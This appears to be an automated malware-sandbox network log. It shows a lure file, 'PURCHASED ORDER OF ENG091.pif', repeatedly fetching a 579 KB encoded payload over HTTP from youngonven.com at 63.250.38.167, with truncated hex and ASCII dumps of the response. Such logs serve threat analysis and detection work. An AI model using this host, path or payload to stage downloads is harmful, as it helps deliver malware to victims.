Oct 8, 2024 11:30:05.225672007 CEST	1236	IN	Data Raw: 1e 22 d2 07 37 3a 0c 09 04 3a 09 33 33 fe 06 00 33 fe 2e 48 ef ee fb f7 f5 4a fa f7 ed ef 3f f2 f4 44 43 2a da 2a 26 25 23 d7 d8 27 24 1e 23 d1 1f ce 1e 17 eb 0d 0d 13 14 1c e9 12 de 0f 0e 1c e0 f3 dd fa d7 08 f1 2d f7 01 f5 f1 43 46 ef 4c f2 ed Data Ascii: "7::333.HJ?DC**&%#'$#-CFL9/55593035390_fgeb``dWYZYPTSPPOZ~on}un\|x\|qrrosqn\XYUMQTQhikeacuxzwqmqs
Oct 8, 2024 11:30:05.225702047 CEST	224	IN	Data Raw: bb b6 ba 8c b4 bb bb b1 84 ad b0 b3 80 7e 7d 16 df e8 18 1a 35 16 26 43 18 1f 11 14 10 34 17 21 1c 2a 0e 17 2a 2c 2c d8 1d d3 cf dc d0 24 d4 38 09 07 35 35 37 3b 01 2d 2e 00 31 2d fe 34 30 fb 47 46 45 49 49 f2 4b ee 43 f6 41 ed ee f4 f9 20 d6 d6 Data Ascii: ~}5&C4!**,,$8557;-.1-40GFEIIKCA 'HJGGC@@@CC=9:-b_ci\[MTZYPRTNrrtq{tnnU
Oct 8, 2024 11:30:05.236115932 CEST	1236	IN	Data Raw: 8f 99 99 98 9a 9a 9c 98 63 95 60 90 9b 99 63 cb bf c8 7a c4 76 c6 c6 c7 c4 bd 72 72 c0 be be b5 86 b6 88 b6 88 8b 86 7d af 80 b0 b4 ae 5c 7b e7 e8 e5 e8 ec e8 3a ea dc e0 dd de e3 d7 e1 e2 d7 d8 e2 47 db dc d9 dd cf d0 cd ce d3 d4 d1 d2 07 08 09 Data Ascii: c`czvrr}\{:G@><>#?6D.KA/IG.4&5=,+JKKFLDBC978;4343133khaecekbiPYMYTUWTTRMNQ~xoprtY
Oct 8, 2024 11:30:05.236150980 CEST	1236	IN	Data Raw: b6 85 87 7f af 85 b1 82 83 81 b1 c5 ca c6 77 76 cb c5 71 73 74 c3 bd 70 6d c4 74 ab 9f a7 ac 57 a8 a9 59 51 9e 4f a2 a3 52 9f 9f 65 66 8e 9c 6c 69 95 65 60 5e 91 62 61 63 5d 9a 79 c8 cb 75 c8 c5 cb 79 71 bd 6f c6 74 c2 ca c2 ba 8a ae bc bc bc 8b Data Ascii: wvqstpmtWYQOReflie`^bac]yuyqot+&%%" <6..4EFIIGID@B+$((""!JHFJJGF=0<4.36--/jijhgbbd`k^cV[XUVW
Oct 8, 2024 11:30:05.236185074 CEST	1236	IN	Data Raw: 31 ff fd fd 3b 02 00 96 6a 5e 99 97 64 62 95 63 5d 64 64 62 90 63 5f 56 a7 a7 5a a5 a8 a7 55 53 52 53 a0 5c 54 a2 9e b9 88 85 ba 8a ba bb bb b0 88 b3 7d b4 b1 7e 81 cc 76 6d 6d 78 75 71 cc 73 6e be 75 c2 c2 c4 c1 a8 a9 5b a6 ab 5a a9 ab a4 9f a2 Data Ascii: 1;j^dbc]ddbc_VZUSRS\T}~vmmxuqsnu[ZPSRfrjVdzv\|{ptrmq%*' 5:95<4303LIJJACA@>))((, !!"%-DD
Oct 8, 2024 11:30:05.236217022 CEST	672	IN	Data Raw: 22 d4 d4 ec 1a 17 18 e9 15 ec 1a 18 0e 0d e2 13 f0 e9 dd 37 06 fa 05 08 f7 0c 06 2f f7 00 2e 00 f6 ed ed f5 f5 f9 03 fe 08 3d 4a fd f3 f1 3e 0c f0 41 0a 98 a5 55 98 98 97 8f 5a 9d 93 93 a1 a2 8f 8d 52 a2 96 65 a5 aa a9 a6 9b 8e 60 a6 8f 63 a6 a8 Data Ascii: "7/.=J>AUZRe`cwy{uuxrosmMYjVkZc_OPcMX[jWWgecibOfhN{}mtm4,*#$895/./0FIH>
Oct 8, 2024 11:30:05.240875006 CEST	1236	IN	Data Raw: 5f 5a 78 7b b7 bb 5d 7d 78 bc bc b8 b1 b1 80 7f 80 7d b0 ec 1c e7 1a eb e5 1b e9 e8 e0 10 e2 11 13 e9 e4 3c 3f 23 1a da da d9 d8 cd cd 21 cf 1f d4 1f d3 ff 36 39 08 0c 0b 37 05 04 03 03 02 ff 0c 32 02 f8 f8 f5 f5 f4 49 4a 4c f3 f1 f1 42 f0 f3 3e Data Ascii: _Zx{]}x}<?#!6972IJLB>'),"!$KKEHCFD>?=7891ljjgh^N\QYONMO~uu{tompXVUWNOeeld_d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49749	63.250.38.167	80	5728	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:18.633702040 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:20.282679081 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:19 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:20.282704115 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:30:20.282718897 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:30:20.282733917 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:30:20.282748938 CEST	896	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:30:20.282764912 CEST	1236	IN	Data Raw: 8f 99 99 98 9a 9a 9c 98 63 95 60 90 9b 99 63 cb bf c8 7a c4 76 c6 c6 c7 c4 bd 72 72 c0 be be b5 86 b6 88 b6 88 8b 86 7d af 80 b0 b4 ae 5c 7b e7 e8 e5 e8 ec e8 3a ea dc e0 dd de e3 d7 e1 e2 d7 d8 e2 47 db dc d9 dd cf d0 cd ce d3 d4 d1 d2 07 08 09 Data Ascii: c`czvrr}\{:G@><>#?6D.KA/IG.4&5=,+JKKFLDBC978;4343133khaecekbiPYMYTUWTTRMNQ~xoprtY
Oct 8, 2024 11:30:20.282778978 CEST	1236	IN	Data Raw: b6 85 87 7f af 85 b1 82 83 81 b1 c5 ca c6 77 76 cb c5 71 73 74 c3 bd 70 6d c4 74 ab 9f a7 ac 57 a8 a9 59 51 9e 4f a2 a3 52 9f 9f 65 66 8e 9c 6c 69 95 65 60 5e 91 62 61 63 5d 9a 79 c8 cb 75 c8 c5 cb 79 71 bd 6f c6 74 c2 ca c2 ba 8a ae bc bc bc 8b Data Ascii: wvqstpmtWYQOReflie`^bac]yuyqot+&%%" <6..4EFIIGID@B+$((""!JHFJJGF=0<4.36--/jijhgbbd`k^cV[XUVW
Oct 8, 2024 11:30:20.282793999 CEST	1236	IN	Data Raw: 31 ff fd fd 3b 02 00 96 6a 5e 99 97 64 62 95 63 5d 64 64 62 90 63 5f 56 a7 a7 5a a5 a8 a7 55 53 52 53 a0 5c 54 a2 9e b9 88 85 ba 8a ba bb bb b0 88 b3 7d b4 b1 7e 81 cc 76 6d 6d 78 75 71 cc 73 6e be 75 c2 c2 c4 c1 a8 a9 5b a6 ab 5a a9 ab a4 9f a2 Data Ascii: 1;j^dbc]ddbc_VZUSRS\T}~vmmxuqsnu[ZPSRfrjVdzv\|{ptrmq%*' 5:95<4303LIJJACA@>))((, !!"%-DD
Oct 8, 2024 11:30:20.282808065 CEST	672	IN	Data Raw: 22 d4 d4 ec 1a 17 18 e9 15 ec 1a 18 0e 0d e2 13 f0 e9 dd 37 06 fa 05 08 f7 0c 06 2f f7 00 2e 00 f6 ed ed f5 f5 f9 03 fe 08 3d 4a fd f3 f1 3e 0c f0 41 0a 98 a5 55 98 98 97 8f 5a 9d 93 93 a1 a2 8f 8d 52 a2 96 65 a5 aa a9 a6 9b 8e 60 a6 8f 63 a6 a8 Data Ascii: "7/.=J>AUZRe`cwy{uuxrosmMYjVkZc_OPcMX[jWWgecibOfhN{}mtm4,*#$895/./0FIH>
Oct 8, 2024 11:30:20.282824993 CEST	1236	IN	Data Raw: 5f 5a 78 7b b7 bb 5d 7d 78 bc bc b8 b1 b1 80 7f 80 7d b0 ec 1c e7 1a eb e5 1b e9 e8 e0 10 e2 11 13 e9 e4 3c 3f 23 1a da da d9 d8 cd cd 21 cf 1f d4 1f d3 ff 36 39 08 0c 0b 37 05 04 03 03 02 ff 0c 32 02 f8 f8 f5 f5 f4 49 4a 4c f3 f1 f1 42 f0 f3 3e Data Ascii: _Zx{]}x}<?#!6972IJLB>'),"!$KKEHCFD>?=7891ljjgh^N\QYONMO~uu{tompXVUWNOeeld_d
Oct 8, 2024 11:30:20.282840014 CEST	1236	IN	Data Raw: ac 58 a7 59 ab a6 55 a0 4f a4 a3 ab a2 52 9d 69 8f 9a 68 6c 94 9a 6b 64 8f 91 95 5f 8e 5d 64 bf 7c c8 cc 7c c5 76 c8 c0 6e 70 be c4 cc 73 c3 b7 b6 8a b9 89 ba b2 bc af af b4 7f 7d 80 83 7e df ec 19 e6 e4 17 1b 19 df e4 df e5 e4 eb 14 e2 d8 25 26 Data Ascii: XYUORihlkd_]d\|\|vnps}~%&**)$;730IGHGB&()&!#$#$,5K9C<3///1-BZThlcx~yx\|u
Oct 8, 2024 11:30:20.282972097 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:19 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:20.283454895 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:19 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49794	63.250.38.167	80	4872	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:26.675836086 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:27.276657104 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:27 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:27.276705980 CEST	224	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&'
Oct 8, 2024 11:30:27.276716948 CEST	1236	IN	Data Raw: 29 e3 2b 06 1d e9 1f d7 21 06 23 48 f5 49 f7 2f fa 34 fc 28 ed 39 f0 17 f2 2c f4 0d 05 4c 07 33 09 2f 0b 32 fd 4b 00 16 02 4c 03 25 d5 1f d7 20 d9 0d db 37 cd 2a d0 40 d1 1e d4 4c e6 3d b8 88 b5 b9 bc 80 7f b1 b2 b1 af b4 80 16 eb 19 17 e8 e4 e8 Data Ascii: )+!#HI/4(9,L3/2KL% 7*@L=((!<6/-01^ZPr]Rvxz\|nprs~VWZ\MPQTegil]_bd689;.024FHIL=?[NY
Oct 8, 2024 11:30:27.276726007 CEST	224	IN	Data Raw: 5d 92 66 6b 90 62 94 5b aa 58 57 58 56 51 cb 55 bc ad 90 a6 9d 93 a1 b4 78 9b ad af b7 cc 9e a2 b3 af c0 b6 b5 bd a6 9a 96 98 a5 7d c7 b1 c5 6d bf c3 74 7b c1 c3 70 5b 5a 56 9e aa aa 5a a6 6e a6 89 7e 61 55 50 64 68 63 a5 8c 64 60 66 5b 7b 74 4f Data Ascii: ]fkb[XWXVQUx}mt{p[ZVZn~aUPdhcd`f[{tOae`pusn%'J-:)$$'@04:GB*B.8K"=J:@H@?>?#L=GA
Oct 8, 2024 11:30:27.277004004 CEST	1236	IN	Data Raw: 48 ee 45 41 f2 49 3d f3 66 97 68 c7 6a ca 6c 91 5e c0 60 bf 62 95 64 cd c7 a2 38 09 3a 0c 66 91 5f 61 64 61 91 63 64 a5 57 4e 5a a5 59 51 a6 4d 9e 56 55 5b 53 59 50 b9 80 89 85 87 86 87 88 84 81 83 ad b2 b2 7d 93 6d 94 95 b8 be c5 bb c9 cc 80 a3 Data Ascii: HEAI=fhjl^`bd8:f_adacdWNZYQMVU[SYP}m`USMQQjie^]`w\|mrs%,$ :559430G;68CECD(,%'%"#))
Oct 8, 2024 11:30:27.277035952 CEST	224	IN	Data Raw: 40 f1 fa 25 d6 1d da d5 28 d7 28 ce d2 1d cf cf 1e d3 20 1c 17 e9 19 15 e9 e7 11 0f 0e 0d 10 1b 13 10 e1 f9 3f 3e f9 44 f6 f7 46 3f 42 44 46 3d 3f ed 44 3b 3b 0b 35 0a 36 3a 06 01 32 fe 34 32 32 04 fd 68 60 6b 69 6a 64 67 96 62 63 66 91 94 93 8e Data Ascii: @%(( ?>DF?BDF=?D;;56:2422h`kijdgbcfb\VMMXZWRTNNNPymw{womnnrmW\\ZYNMPOTl^{rmt}},)%%!"
Oct 8, 2024 11:30:27.277060032 CEST	1236	IN	Data Raw: 1e 22 d2 07 37 3a 0c 09 04 3a 09 33 33 fe 06 00 33 fe 2e 48 ef ee fb f7 f5 4a fa f7 ed ef 3f f2 f4 44 43 2a da 2a 26 25 23 d7 d8 27 24 1e 23 d1 1f ce 1e 17 eb 0d 0d 13 14 1c e9 12 de 0f 0e 1c e0 f3 dd fa d7 08 f1 2d f7 01 f5 f1 43 46 ef 4c f2 ed Data Ascii: "7::333.HJ?DC**&%#'$#-CFL9/55593035390_fgeb``dWYZYPTSPPOZ~on}un\|x\|qrrosqn\XYUMQTQhikeacuxzwqmqs
Oct 8, 2024 11:30:27.277147055 CEST	1236	IN	Data Raw: bb b6 ba 8c b4 bb bb b1 84 ad b0 b3 80 7e 7d 16 df e8 18 1a 35 16 26 43 18 1f 11 14 10 34 17 21 1c 2a 0e 17 2a 2c 2c d8 1d d3 cf dc d0 24 d4 38 09 07 35 35 37 3b 01 2d 2e 00 31 2d fe 34 30 fb 47 46 45 49 49 f2 4b ee 43 f6 41 ed ee f4 f9 20 d6 d6 Data Ascii: ~}5&C4!**,,$8557;-.1-40GFEIIKCA 'HJGGC@@@CC=9:-b_ci\[MTZYPRTNrrtq{tnnUc`cz
Oct 8, 2024 11:30:27.277157068 CEST	1236	IN	Data Raw: a5 57 a6 a1 54 4e a2 54 ac a3 a2 97 95 98 69 9a 96 6c 98 8d 5f 60 8f 5d 8f 91 93 c0 c5 ca 79 cc c6 c5 76 71 c2 c6 be be bf ca 71 88 8a ba 85 ba b7 8c b7 b7 b0 83 b3 7d b0 82 b3 e6 ea dd 18 e6 1b 16 e2 df 12 df e0 df 0e 14 0d d9 2c d7 2c d4 2a 2c Data Ascii: WTNTil_`]yvqq},,,#"6:042EJG?C+!, JJA==FC?@7-;777230./gfkjg^h`_c^cNUVQTTSwvq
Oct 8, 2024 11:30:27.277172089 CEST	1236	IN	Data Raw: 54 51 9d 51 a2 5a 52 86 7f 89 b9 86 8a 8b 87 b0 83 85 7e 80 83 ad b3 c8 75 c9 76 ca 79 ca c8 6f 71 76 c4 72 6d 74 72 55 a8 58 9e 57 58 57 a9 a7 52 52 9d a2 a0 52 4e 97 6c 69 6a 98 67 92 6b 98 62 63 96 91 94 63 93 c9 ca c5 c8 c9 7b 7a c1 bf 6f c5 Data Ascii: TQQZR~uvyoqvrmtrUXWXWRRRNlijgkbcc{zop~))+!.;6;878../3GF=@A &( )FJIHG=CF?8:7:1;j^dbc]dd
Oct 8, 2024 11:30:27.282036066 CEST	1236	IN	Data Raw: f1 fa f0 f0 48 06 46 02 07 f2 4a 01 09 ef 3e ef 0c fe 42 92 a8 9a a8 9c a8 92 8f 99 5a c1 96 90 54 a4 8d a6 9b 97 9d 97 93 69 a3 a4 97 5d 8e 91 a5 8f a9 bb bb b9 76 b4 c9 79 b0 ba c4 6d ad c0 c0 b9 b7 b5 bf af c9 c7 8c b5 bf 7f b0 c2 b0 bd c5 b3 Data Ascii: HFJ>BZTi]vymlMMjPjT^Nb\UWhjgh_cxymmsm}K)*%!!!)'$!!FI.8I9H;2<?:C6J58C;EC1K43G""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49835	63.250.38.167	80	3004	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:30:35.959316969 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:30:36.603615046 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:30:36 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:30:36.603635073 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
